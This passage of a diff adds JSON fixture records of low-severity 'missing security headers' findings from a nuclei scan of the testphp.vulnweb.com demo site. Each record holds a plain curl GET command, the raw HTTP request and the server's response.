'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:41:43.984Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 686, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/bxss/adminPan3l", + "discovered_date": "2024-11-13T02:41:44.148Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /bxss/adminPan3l HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<head>\n <title>Administrative panel</title> \n <link rel="stylesheet" type="text/css" href="style.css"> \n</head>\n \n<body>\n<p> \n <center>\n <img src="http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png" alt="Acunetix website security">\n <h2>Administrative Panel</h2>\n </center>\n</p> \n \n<b>Last 100 visitors on this site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 687, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:44.332Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 688, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:44.492Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 689, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:44.649Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 690, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:44.826Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 691, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:44.988Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 692, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:45.152Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 693, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:45.300Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 694, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:41:45.448Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 695, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/1", + "discovered_date": "2024-11-13T02:41:45.606Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 696, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:41:45.762Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 697, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:45.909Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 698, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:46.069Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + 